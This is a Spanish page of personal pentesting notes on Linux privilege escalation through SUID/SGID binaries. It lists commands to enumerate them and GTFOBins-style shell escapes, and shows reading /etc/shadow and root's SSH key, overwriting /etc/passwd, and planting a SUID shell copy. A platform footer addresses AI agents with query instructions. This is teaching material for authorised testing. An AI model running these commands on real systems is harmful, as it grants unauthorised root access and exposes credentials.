> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/privesc/suid.md).

# SUID

Los binarios SUID se ejecutan con los privilegios de su propietario, a menudo root. Un binario SUID vulnerable, desactualizado o demasiado flexible puede leer archivos protegidos, abrir una shell privilegiada o ejecutar código controlado por el atacante.

## Metodología

* Enumera los binarios SUID y compara las entradas inusuales con GTFOBins.
* Prioriza binarios personalizados, versiones antiguas, dependencias con permiso de escritura y binarios ubicados fuera de las rutas estándar del sistema.
* Prueba primitivas de lectura, escritura, ejecución de comandos y carga de bibliotecas antes de ejecutar cargas útiles destructivas.

## Comprobaciones rápidas

```bash
find / -perm -4000 -type f 2>/dev/null
find / -type f -perm -4000 -ls 2>/dev/null
find / -type f -perm -2000 -ls 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
```

## Triage de SUID y SGID

SUID ejecuta el binario con los privilegios del propietario del archivo, mientras que SGID lo ejecuta con los privilegios del grupo del archivo. Después de la enumeración, compara los binarios inusuales con [GTFOBins](https://gtfobins.github.io/) y prioriza rutas personalizadas, directorios con permiso de escritura y binarios propiedad de root.

Comprobaciones rápidas útiles:

```bash
find / -type f -perm -4000 -ls 2>/dev/null
find / -type f -perm -2000 -ls 2>/dev/null
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -la {} \; 2>/dev/null
```

Ejemplos comunes al estilo GTFOBins:

```bash
find . -exec /bin/sh -p \; -quit
```

Para `nano`, usa `Ctrl+R`, luego `Ctrl+X`, luego ejecuta:

```
reset; sh 1>&0 2>&0
```

Para `vim`:

```bash
vim -c ':shell'
vim -c ':!/bin/sh'
```

Si un flujo de trabajo de copia privilegiada SUID puede sobrescribir archivos sensibles, valida cuidadosamente la primitiva de escritura antes de tocar archivos de producción:

```bash
cp /tmp/malicious_passwd /etc/passwd
```

Si `base64` si es SUID, úsalo como primitiva de lectura en lugar de primitiva de shell:

```bash
ls -la /usr/bin/base64
/usr/bin/base64 /etc/shadow | base64 --decode
/usr/bin/base64 /root/.ssh/id_rsa | base64 --decode
/usr/bin/base64 /var/log/auth.log | base64 --decode
```

Si `cp` si es SUID, valida si puede crear o conservar una copia privilegiada:

```bash
cp /bin/sh /tmp/sh
chmod +s /tmp/sh
/tmp/sh -p
```

Binarios SUID/SGID comunes que vale la pena revisar:

| Binario                                               | Por qué revisarlo                                                        |
| ----------------------------------------------------- | ------------------------------------------------------------------------ |
| `sudo` / `su`                                         | Herramientas directas de frontera de privilegios.                        |
| `passwd`, `chsh`, `newgrp`, `gpasswd`                 | Ayudas para modificar cuentas y grupos.                                  |
| `at`                                                  | Ejecución programada de comandos.                                        |
| `mount`, `umount`                                     | Acceso al sistema de archivos y opciones de montaje.                     |
| `pkexec`                                              | Asistente de Polkit, afectado históricamente por PwnKit.                 |
| `base64`                                              | Lee archivos protegidos y decodifica localmente.                         |
| `cp`                                                  | Copia o sobrescribe archivos cuando los permisos lo permitan.            |
| `find`, `nano`, `vim`, `less`, `more`, `bash`, `dash` | Primitivas de shell, lectura o escritura de archivos al estilo GTFOBins. |
| `nmap`                                                | Modo interactivo heredado o rutas de ejecución de scripts.               |

<table data-view="cards" data-full-width="false" data-search="false"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th></tr></thead><tbody><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID pkexec / PwnKit</h4></td><td>Notas de SUID (Pkexec) para escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación centrada en informes.</td><td><a href="/pages/47b1f004e42b03fb00437f930042d3edc747f8c5">/pages/47b1f004e42b03fb00437f930042d3edc747f8c5</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Base64</h4></td><td>Notas de SUID (Base64) para escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación centrada en informes.</td><td><a href="/pages/02482fc01a8e79160e9de995fd7cff8c160a465f">/pages/02482fc01a8e79160e9de995fd7cff8c160a465f</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID PHP</h4></td><td>Notas de SUID (PHP) para escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación centrada en informes.</td><td><a href="/pages/6b8991ffab0e40becb0a837dcdf856fd1cd8df17">/pages/6b8991ffab0e40becb0a837dcdf856fd1cd8df17</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>Volcado de núcleo SUID /opt/count</h4></td><td>Notas de SUID - Volcado de memoria (/opt/count) para escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación centrada en informes.</td><td><a href="/pages/656ba3c682b3016060cc11028ed67c69d626c82c">/pages/656ba3c682b3016060cc11028ed67c69d626c82c</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>Archivo faltante SUID</h4></td><td>Notas de binario SUID (archivo faltante) para escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación centrada en informes.</td><td><a href="/pages/4d77ac80a77eeba06447bab47f8b575aea548350">/pages/4d77ac80a77eeba06447bab47f8b575aea548350</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID screen</h4></td><td>Notas de SUID (screen) para escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación centrada en informes.</td><td><a href="/pages/5bbfac29c9a193f65829639cae7c5babc4a8a08a">/pages/5bbfac29c9a193f65829639cae7c5babc4a8a08a</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Nmap</h4></td><td>Notas de SUID (Nmap) para escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación centrada en informes.</td><td><a href="/pages/8ae2a41dcd92b693e011451a8401b7109a241d6d">/pages/8ae2a41dcd92b693e011451a8401b7109a241d6d</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>Binario de copia de seguridad SUID</h4></td><td>Notas de binario SUID (copia de seguridad) para escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación centrada en informes.</td><td><a href="/pages/a8e91c0b16c0f30aa36874c51eae948dcaad6e5b">/pages/a8e91c0b16c0f30aa36874c51eae948dcaad6e5b</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Enlightenment</h4></td><td>Notas de SUID (Enlightenment) para escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación centrada en informes.</td><td><a href="/pages/f9dfa6f190faf0e9c5f70325ad84e00475ce2c98">/pages/f9dfa6f190faf0e9c5f70325ad84e00475ce2c98</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/privesc/suid.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
